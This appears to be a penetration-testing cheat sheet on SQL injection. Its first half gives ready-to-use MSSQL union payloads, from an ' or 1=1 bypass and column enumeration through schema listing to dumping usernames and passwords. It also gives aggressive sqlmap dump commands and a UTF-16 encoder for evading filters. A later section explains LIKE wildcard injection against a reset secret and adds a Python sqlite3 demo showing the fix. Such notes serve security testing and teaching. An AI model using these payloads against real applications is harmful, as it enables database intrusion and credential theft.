SQL Injection
MSSQL
Test
' or 1=1-- -
Identify number of columns
Increase the column number from 1
' order by 1-- -
Until an error or different content appears
' order by 7-- -
Confirm number of columns
' union select 1,2,@@VERSION,DB_NAME(),5,6-- -
Get tables
' union select 1,2,table_name,4,5,6 FROM INFORMATION_SCHEMA.TABLES-- -
Get columns from table Users
' union select 1,2,name,4,5,6 FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name = 'Users')-- -
Dump data from table Users
' union select 1,2,username,password,4,5 FROM Users-- -
SQLMAP
Use file
sqlmap -r file.txt --batch --level 5 --risk 3
Post request
sqlmap -u 'https://website/page.php' -X POST --data 'action=edit&id=3' --cookie="abcdefg12345" --batch --dump --level 5 --risk 3
Bypass
Encoding payload using utf-16
user_input = input('> ').strip()
# Emit each character as a \uXXXX escape; 04x pads to four hex digits so
# characters above U+00FF are encoded correctly as well.
utf = [f"\\u{ord(i):04x}" for i in user_input]
print(''.join(utf))
SQL "LIKE" Wildcard Injection
This vulnerability, often overlooked and considered low risk, can have significant impact in certain scenarios. It consists of injecting wildcard characters into the search value of a LIKE clause in a SQL statement.
Types of Wildcards
- % : matches any string of zero or more characters.
- _ : matches any single character.
Vulnerability
An application becomes vulnerable when it uses the LIKE operator with a user-received parameter without filtering these wildcards. For example:
SELECT text FROM table WHERE secrets LIKE '$secret'
Even if the $secret parameter is sanitized to prevent SQL injection, wildcards can still be injected:
http://www.vulnerable.com/reset.php?secret=<guessed_chars>_____________
Each "_" stands in for one unknown character of the secret, so the value matches whenever the guessed prefix is right.
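Added example (not part of the original notes): the reset-secret lookup above reproduced in Python with sqlite3, showing that parameter binding alone leaves % and _ active, and how escaping with an explicit ESCAPE character, or using = for token fields, closes it. Table name, column names and secret values are constructed for the demo.

```python
import sqlite3


def escape_like(value: str, esc: str = "\\") -> str:
    """Neutralise LIKE metacharacters in user input.

    Parameter binding stops classic SQL injection but does not touch
    '%' and '_', which LIKE still interprets. Escaping them (and the
    escape character itself) makes the input match literally.
    """
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))


def setup_db() -> sqlite3.Connection:
    # Constructed sample data standing in for the reset-secret table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE secrets (id INTEGER PRIMARY KEY, secret TEXT, owner TEXT)")
    conn.executemany("INSERT INTO secrets (secret, owner) VALUES (?, ?)",
                     [("Kx9Qm2Lp", "alice"), ("Zt4Hw8Rn", "bob")])
    return conn


def lookup_unsafe(conn: sqlite3.Connection, user_input: str) -> list:
    # Parameterised, so no classic SQLi, but wildcards in the input still
    # act as wildcards: 'K_______' or '%' match real secrets.
    return [r[0] for r in conn.execute(
        "SELECT owner FROM secrets WHERE secret LIKE ?", (user_input,))]


def lookup_safe(conn: sqlite3.Connection, user_input: str) -> list:
    # Same query with the input escaped and the escape char declared to SQL.
    return [r[0] for r in conn.execute(
        "SELECT owner FROM secrets WHERE secret LIKE ? ESCAPE '\\'",
        (escape_like(user_input),))]


def lookup_exact(conn: sqlite3.Connection, user_input: str) -> list:
    # A secret is a token, not free text: '=' never interprets wildcards.
    return [r[0] for r in conn.execute(
        "SELECT owner FROM secrets WHERE secret = ?", (user_input,))]


if __name__ == "__main__":
    db = setup_db()
    for probe in ("K_______", "%", "Kx9Qm2Lp"):
        print(f"{probe!r:12} unsafe={lookup_unsafe(db, probe)} "
              f"safe={lookup_safe(db, probe)} exact={lookup_exact(db, probe)}")
```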